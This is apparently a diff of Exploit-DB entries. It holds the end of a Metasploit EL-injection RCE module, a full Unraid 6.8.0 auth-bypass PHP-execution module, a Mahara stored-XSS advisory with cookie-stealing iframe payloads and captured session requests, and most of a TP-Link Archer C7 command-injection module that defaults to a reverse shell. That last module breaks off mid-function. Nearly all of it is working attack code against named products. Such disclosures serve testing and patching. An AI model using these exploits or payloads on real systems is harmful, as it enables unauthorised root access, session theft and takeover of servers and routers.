vprint_status("Executing command: #{cmd}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/service/rest/beta/repositories/go/group'),
# HACK: Bypass CSRF token with random User-Agent header
'agent' => rand_text_english(8..42),
'cookie' => opts[:cookie],
'ctype' => 'application/json',
'data' => json_payload(cmd)
)
unless res
fail_with(Failure::Unknown, 'Target did not respond to payload request')
end
unless res.code == 400 && res.body.match(/java\.lang\.UNIXProcess@\h+/)
fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
end
print_good("Successfully executed command: #{cmd}")
end
# PoC based off API docs for /service/rest/beta/repositories/go/group:
# http://localhost:8081/#admin/system/api
def json_payload(cmd)
{
'name' => 'internal',
'online' => true,
'storage' => {
'blobStoreName' => 'default',
'strictContentTypeValidation' => true
},
'group' => {
# XXX: memberNames has to be an array, but the API example was a string
'memberNames' => [el_payload(cmd)]
}
}.to_json
end
# Helpful resource from which I borrowed the EL payload:
# https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
def el_payload(cmd)
# HACK: Format our EL expression nicely and then strip introduced whitespace
el = <<~EOF.gsub(/\s+/, '')
${
"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke(
"".getClass().forName("java.lang.Runtime")
).exec("PATCH_ME")
}
EOF
# Patch in our command, escaping any double quotes
el.sub('PATCH_ME', cmd.gsub('"', '\\"'))
end
end

101
exploits/linux/remote/48353.rb Executable file
View file

@ -0,0 +1,101 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
'Description' => %q{
This module exploits two vulnerabilities affecting Unraid 6.8.0.
An authentication bypass is used to gain access to the administrative
interface, and an insecure use of the extract PHP function can be abused
for arbitrary code execution as root.
},
'Author' =>
[
'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
],
'References' =>
[
[ 'CVE', '2020-5847' ],
[ 'CVE', '2020-5849' ],
[ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
[ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
],
'License' => MSF_LICENSE,
'Platform' => ['php'],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 10 2020'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET'
)
unless res
return CheckCode::Unknown('Connection failed')
end
unless res.code == 200
return CheckCode::Safe('Unexpected reply')
end
/\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})&nbsp;/ =~ res.body
if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
end
CheckCode::Safe
end
def exploit
begin
vprint_status('Sending exploit code')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET',
'encode_params' => false,
'vars_get' =>
{
'path' => 'x',
'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
}
)
if res.nil?
print_good('Request timed out, OK if running a non-forking/blocking payload...')
elsif res.code == 302
fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
else
print_warning("Unexpected response code #{res.code}, please check your payload.")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end

248
exploits/linux/webapps/48367.txt Normal file
View file

@ -0,0 +1,248 @@
# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-21
# Vendor: https://mahara.org
# Software Link: https://launchpad.net/mahara
# CVE: N/A
Document Title:
===============
Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2217
Release Date:
=============
2020-04-21
Common Vulnerability Scoring System:
====================================
4.3
Affected Product(s):
====================
Catalyst IT Ltd.
Product: Mahara v19.10.2 - CMS (Web-Application)
https://launchpad.net/mahara & https://mahara.org
Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent vulnerability is located in the `nombre` and
`descripción` parameters of the `Ficheros` module in the
`groupfiles.php` file.
Remote attackers with low privileges are able to inject own malicious
persistent script code as files and foldernames. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located on
the application-side. Files are able to be reviewed in the backend by
higher privileged accounts and can be shared.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Ficheros (Files Manager)
Vulnerable Input(s):
[+] Crear Carpeta
Vulnerable File(s):
[+] groupfiles.php
Vulnerable Parameter(s):
[+] nombre
[+] descripción
Affected Module(s):
[+] Página principal
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & Descripción)
input field for the página principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user
account that review (Backend)
6. Successul reproduce of the persistent cross site web vulnerability!
PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal)
<tr id="file:7191" class="file-item folder no-hover ui-droppable">
<td class="icon-cell">
<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
tabindex="0">
<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
<span class="icon-folder-open icon icon-lg " role="presentation"
aria-hidden="true"></span>
</div></td>
<td class="filename">
<a
href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"
id="changefolder:7191" class="inner-link changefolder">
<span class="sr-only">Carpeta:</span>
<span class="display-title ">>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
</a></td>
<td class="filedescription d-none d-md-table-cell">
>"<iframe></iframe> >"<iframe></iframe></td>
<td class="filesize"></td>
<td class="filedate">20/04/2020</td>
<!-- Ensure space for 3 buttons (in the case of a really long single
line string in a user input field -->
<td class="text-right control-buttons ">
<div class="btn-group">
... ...
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-pencil-alt icon-lg" role="presentation"
aria-hidden="true"></span>
<span class="sr-only">Edit folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span></button>
<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-trash-alt text-danger icon-lg"
role="presentation" aria-hidden="true"></span>
<span class="sr-only">Delete folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span>
</button></div></td>
--- PoC Session Logs [POST] --- (Mygroup Ficheros)
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------98107146915324237501974151621
Content-Length: 4879
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
files_filebrowser_edit_title=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
files_filebrowser_edit_licensor=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
files_filebrowser_update[7191]=Guardar
cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2-
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
-
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------126319663526561351602937008964
Content-Length: 3721
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2
Reference(s):
https://mahara_cms.localhost:8080/artefact/
https://mahara_cms.localhost:8080/artefact/file/
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM

391
exploits/linux_mips/remote/48331.rb Executable file
View file

@ -0,0 +1,391 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution',
'Description' => %q{
This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on
the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command
as root, including downloading and executing a binary from another host.
This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
Radek Domanski).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
[ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
[ 'CVE', '2020-10882'],
[ 'CVE', '2020-10883'],
[ 'CVE', '2020-10884'],
[ 'ZDI', '20-334'],
[ 'ZDI', '20-335'],
[ 'ZDI', '20-336' ]
],
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'Payload' => {},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
'WfsDelay' => 15,
},
'Targets' =>
[
[ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ]
],
'DisclosureDate' => "Mar 25 2020",
'DefaultTarget' => 0,
)
)
register_options(
[
Opt::RPORT(20002)
])
register_advanced_options(
[
OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15])
])
end
def check
begin
res = send_request_cgi({
'uri' => '/webpages/app.1564127413977.manifest',
'method' => 'GET',
'rport' => 80
})
if res && res.code == 200
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
pass
end
return Exploit::CheckCode::Unknown
end
def calc_checksum(packet)
# reference table used to calculate the packet checksum
# used by tdpd_pkt_calc_checksum (0x4037f0)
# located at offset 0x0416e90 in the binary
reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee,
0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4,
0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79,
0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c,
0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d,
0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41,
0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83,
0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9,
0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa,
0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10,
0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b,
0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8,
0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32,
0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d,
0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf,
0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95,
0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6,
0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c,
0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01,
0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85,
0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78,
0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98,
0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6,
0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30,
0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82,
0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9,
0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15,
0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61,
0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a,
0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4,
0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda,
0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c,
0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe,
0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85,
0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29,
0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d,
0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed,
0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2,
0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73,
0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a,
0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a,
0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3,
0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80,
0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b,
0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9,
0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e,
0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f,
0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06,
0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36,
0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf,
0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc,
0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77,
0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5,
0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a,
0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b,
0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3,
0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72,
0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a,
0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5,
0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2,
0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81,
0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47,
0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11,
0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff,
0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e,
0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16,
0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9,
0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae,
0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd,
0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3,
0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23,
0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b,
0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a,
0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
res = 0xffffffff
# main checksum calculation
packet.each_entry { |c|
index = ((c ^ res) & 0xff) * 4
# .reverse is needed as the target is big endian
ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first)
res = ref ^ (res >> 8)
}
checksum = ~res
checksum_s = [(checksum)].pack('I>').force_encoding("ascii")
# convert back to string
packet = packet.pack('C*').force_encoding('ascii')
# and replace the checksum
packet[12] = checksum_s[0]
packet[13] = checksum_s[1]
packet[14] = checksum_s[2]
packet[15] = checksum_s[3]
packet
end
def aes_encrypt(plaintext)
# Function encrypts perfectly 16 bytes aligned payload
if (plaintext.length % 16 != 0)
return
end
cipher = OpenSSL::Cipher.new 'AES-128-CBC'
# in the original C code the key and IV are 256 bits long... but they still use AES-128
iv = "1234567890abcdef"
key = "TPONEMESH_Kf!xn?"
encrypted = ''
cipher.encrypt
cipher.iv = iv
cipher.key = key
# Take each 16 bytes block and encrypt it
plaintext.scan(/.{1,16}/) { |block|
encrypted += cipher.update(block)
}
encrypted
end
def create_injection(c)
# Template for the command injection
# The injection happens at "slave_mac" (read advisory for details)
# The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions.
# This will fail if we send a command with single quotes (')
# ... but that's not a problem for this module, since we don't use them for our command.
# It might also fail with double quotes (") since this will break the JSON...
inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"
template = "{\"method\":\"slave_key_offer\",\"data\":{"\
"\"group_id\":\"#{rand_text_numeric(1..3)}\","\
"\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\
"\"slave_mac\":\"%{INJECTION}\","\
"\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\
"\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\
"\"want_to_join\":false,"\
"\"model\":\"#{rand_text_alpha(5..13)}\","\
"\"product_type\":\"#{rand_text_alpha(5..13)}\","\
"\"operation_mode\":\"A%{PADDING}\"}}"
# This is required to calculate exact template length without replace flags
template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length
# This has to be initialized to cover the situation when no padding is needed
pad = ''
padding = rand_text_alpha(16)
template_len += inject.length
# Calculate pad if padding is needed
if (template_len % 16 != 0)
pad = padding[0..15-(template_len % 16)]
end
# Here the final payload is created
template % {INJECTION:"#{inject}", PADDING:"#{pad}"}
end
def update_len_field(packet, payload_length)
new_packet = packet[0..3]
new_packet += [payload_length].pack("S>")
